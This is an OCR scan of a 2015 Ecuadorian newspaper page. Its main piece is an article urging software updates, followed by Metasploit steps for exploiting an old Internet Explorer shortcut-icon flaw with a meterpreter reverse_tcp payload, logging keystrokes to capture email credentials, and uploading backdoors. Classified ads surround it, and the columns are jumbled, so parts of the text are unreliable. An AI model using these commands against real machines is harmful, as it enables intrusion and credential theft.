Diario La Hora Loja 06 de Septiembre 2015

Page 21

Actualiza tu software y evita el hackeo de tu máquina

Una guía que permite entender las vulnerabilidades que permiten ingresos peligrosos en sus sistemas. POR: LUIS ENRÍQUEZ

De seguro todos han escuchado la recomendación de mantener sus sistemas y aplicaciones actualizados. Pues tienen toda la razón. Así, explicaré por qué es tan peligroso no mantenerlos al día. Comencemos con decir que el principal objetivo de las actualizaciones es corregir las fallas de seguridad (o bugs) encontradas en el software.

Esta vulnerabilidad permite a un tercero atacar y explotar dicho sistema informático. Para explotarlas, se programan los exploits, que son programas destinados a verificar las fallas de seguridad del software, obteniendo el control del sistema. Las empresas grandes de Internet, como Google o Mozilla, pagan a los hackers para

EXPLORA E

que encuentren debilidades en malicioso que permite la transsus códigos fuentes y así evitar misión de datos entre la computadora hackeada y la del grandes perdidas ecoEL DATO atacante. nómicas. Las vulnerabilidades reportadas y los exploits Keyloggers: Son Manos a la obra conocidos pueden co- programas que *Metasploit graban toda la nocerse en sitios como: información que Es uno de los kits de herraingresada https://nvd.nist.gov/ o es mientas más eficaces para desde el teclado https://www.exploit-db. de tu computa- explotar vulnerabilidades. dor. com/. Hay una versión libre y Una vez que los exotra pagada. Casi todos sus ploits han obtenido acceso al componentes son software libre sistema aprovechándose de las (y open source), garantizados fragilidades, necesitan de un bajo los términos de la licencia Payload (o carga) para ser ejecu- 3-clause BSD. A continuación, tadas. El Payload es el programa la forma cómo actúan los piratas:

1. Descarga Metasploit desde °http:/ /www.metasploit.com/

B13

DOMINGO 06 DE SEPTIEMBRE DE 2015 La Hora, ECUADOR

6. Ahora aparece un mensaje de °advertencia por salir del modo seguro de Internet Explorer. Muchos no le harán caso, como es habitual al navegar en Internet.

se habrá explotado el sistema de la víctima, ganando el control °de7.suEntonces, sistema. Después, investigamos algunas acciones que el atacante puede

Ocultar archivos en lugares inesperados. Archivos secretos dentro de fotos, audios, etc...

hacer una vez que hackeó la máquina deseada.

viene con funcionalidad de keylogger. Habilitamos está función °con8.elMetasploit comando keyscan_start.

2. Una vez instalado, corremos la °ejecutable. En este caso (o en cual-

4. Una vez ejecutada la exploit, la computadora quedará en la espera de recibir la conexión remota.

quier distribución basada en Linux), desde el terminal con msfconsole.

lo que la víctima digite en su teclado será enviado al atacante. Inclu°idas9. Todo sus credenciales de email: chequea el keylogger con el comando keyscan_dump: °Así10.esSecomo los hackers tienen acceso a los emails de la víctima.

Buscamos una vulnerabili°dad3. para explotar. En este caso

se utilizará una conocida, llamada ms10_046_shotcut_icon_dllloader. Es una falla común en Internet Explorer, utilizada para explotar sistemas operativos de Windows 7. Los comandos a utilizar son los siguientes: - use exploit/windows/browser/ms10_046_shortcut_icon_ dllloader - set SRVHOST (tu dirección IP) - set LHOST (de nuevo tu dirección IP) - set PAYLOAD windows/meterpreter/reverse_tcp - exploit

11. Ahora, para terminar, el atacante también puede subir archivos a la máquina de °la víctima. Esto es grave, pues podría subir un backdoor para acceso permanente, e

5. Desde la máquina de la víctima se visita la página del atacante. Para esto podrían usar un nombre de dominio (como www.pastebin.com) en lugar de una dirección IP.

incluso evidencia falsa. Ej: Imagínate que te suban archivos con el único fin de generar evidencias falsas, para culparte acerca de delitos que no has cometido.

VENTA DE CAMIONES HINO FM MODELO 2015 $ 68000 PRONCA 0987361644

VENTA DE CHEVROLET LUV 2005

0987361644

PAP/63711

DISEL Y GASOLINA MATRICULADAS

PAC63711fa

P-PR

¡NO SUFRAS MÁS!

* En caso de comunicaciones remotas y para utilizar nombres de dominio (como www. pastebin.com), en lugar de direcciones IP, utilizan el Payload: windows/meterpreter/reverse_tcp_dns.

Está usted cansado de perder su tiempo y dinero?

JOSÉ DE LOS SANTOS

Y SUS 13 CONSEJEROS DEL AMOR

La persona que amas te rechaza? te humilla? te engaña?

No quiere saber nada

de tí? Deja de llorar! NO PROMETEMOS, José de los Santos, únicos maestros CUMPLIMOS

VENDO

José de los Santos le dirá todo lo que necesita saber sobre AMOR, Orientamos SUERTE, SALUD Y VIAJES a través matrimonios evitar de sus rituales de amor, conocerás para divorcios la causa de tus problemas o males

NO PERMITAS QUE NADA NI NADIE JUEGUE CON TUS SENTIMIENTOS Y DESESPERACIÓN

DEJA DE LLORAR, NO ESTÁS SOLO

PAP/63594

INF: 0998314070

conocedores de los mejores SECRETOS para ATRAER, CONQUISTAR y ENAMORAR a la persona que quieres no importa dónde esté.

P AR/100747/AG

SERIE BIG BLUE 400 CX

PAP/63735

P:F/35415

MOTO SOLDADORA SEMI NUEVA MARCA MILLER

Expertos en Recuperar Amores Imposibles y Rebeldes

TRABAJOS GARANTIZADOS O LE DEVOLVEMOS SU DINERO

CONSULTA $ 5

LLAME YA AL: 098 190 66 99

P-211099-MIG


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.
Diario La Hora Loja 06 de Septiembre 2015 by LA HORA Ecuador - Issuu